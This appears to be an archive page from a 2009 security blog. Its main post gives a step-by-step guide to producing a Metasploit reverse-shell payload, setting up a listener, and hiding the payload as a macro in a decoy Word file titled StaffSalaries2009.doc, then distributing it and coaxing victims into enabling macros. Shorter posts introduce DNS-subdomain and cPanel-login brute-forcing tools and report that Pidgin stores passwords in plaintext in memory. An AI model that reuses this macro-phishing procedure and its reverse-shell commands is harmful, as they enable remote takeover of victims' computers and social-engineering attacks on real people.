Monthly Archives: April 2009

DomainBF

Since public DNS zone transfers are prohibited, you can use this tiny Java program to get the subdomains of a given domain by brute-force. See file’s comments for more details. You may want to get the subs.list file to use in conjunction with DomainBF.

DomainBF.java

The MS Office, a Macro and a Shell

Leave a reply

In this post we will go through the steps to create a VBA (Visual Basic for Applications) payload using Metasploit Framework and stick that into a Microsoft Office Word 2003 document. When the target users open up the document we will get a command line prompt. The process is divided in four parts.

Part1 – Payload generation
./msfpayload windows/shell_reverse_tcp LPORT=5000 LHOST=192.168.1.108 V> /var/www/win.sh_rev_tcp.1.108-5000.txt

Part2 – Attacker’s end-point preparation
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5000
LPORT => 5000
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

[pentester waits here for victim to eat the bait…once file is opened a shell is spawned as follows]

[*] Command shell session 1 opened (192.168.1.108:5000 -> 192.168.1.106:1040)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>systeminfo
systeminfo

Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
…
…
C:\Documents and Settings\Administrator>

Part3 – Wrap bait into Office Word document
a. First, we need to copy the contents of file win.sh_rev_tcp.1.108-5000.txt, generated in Part1 over to our Windows machine. Having a web server at the Linux site is always handly, we just opening up Firefox and pointing to http://192.168.1.108/win.sh_rev_tcp.1.108-5000.txt
b. Now, create a new MS Office Word 2003 document, named it StaffSalaries2009.doc.
c. Open the new document, go to Tools | Macro | Visual Basic Editor
d. On the left hand side, double click on the ThisDocument icon, the area where you should paste the code will popup in the middle of the screen
e. Paste the code from win.sh_rev_tcp.1.108-5000.txt
f. Save the script into the document by clicking the Save icon at the toolbar, do File | Close and Return to Microsoft Word
g. Add some data to your fishie document so to look genuine, Save and Exit
h. Distribute the document and hold back

* The above also apply for Office Excel documents, however please note that the generated Visual Basic code should be saved into ThisWorkbook item instead of ThisDocument, as per instruction d.

Part4 – Distribution etc
Having done all these, you can send the file as an attachment or save to a shared area where your victims can spot it and fire it up, if their Macro Security (Tools | Macro | Security… ) level is set to low your goal will be achieved instantly. In any other case the users will get a friendly message telling them “The macros in this project are disabled. Please refer to the online help or documentation of the host application to determine how to enable macros.” with an OK and Help button, pressing the Help button tells them exactly where to click so to enable macros.

IM Memory Dumping (cont.)

Leave a reply

(You may want to read first IM Memory Dumping)

According to Wikipedia on April 6th 2007, GAIM’s project development team changed the name of the popular IM to Pidgin, as a result of their settlement with AOL and latter’s trademarked acronym AIM. So we downloaded Pidgin’s latest version 2.5.5 and installed it in our VMware Windows box. We happily added our demo username and password (for our test it does not matter if you tick the box saying remember password, or not, as there is no change in the result of our experiment). Then we dumped Pidgin’s process memory, saved it to a file in our Samba share, the file consumed about 50MB of space. From there, using the strings command we searched for sequences of printable characters; by grep-ing for our set password we found three instances of it in different places (all of them of course in plaintext).

We changed our account password a few times and repeated the process again and again, last we concluded that:
1. every time the password was stored three times in the process memory
2. one of the locations is very easily spotted in the dump (if you view the file with a Hex editor you will see that there is always a large block of random data then the string =p&=, then some random numbers (which they do not always appear) and finally our password). As you understand even if you do not know the secret password you can find it by trial and error in just a few tries.

I guess that other IM clients is very likely to store your passwords amongst other information in clear. I can not tell you do not use program X or program Y because they do not properly encrypt your passwords or do not scrub the memory, but I can advise you to take under serious consideration which ones you do use at home and work, and think how much exposed you are.

cPanel Brute Forcer

Leave a reply

A simple Perl script to brute-force your favorite hosting provider’s cPanel login page.

cpanel_bf.pl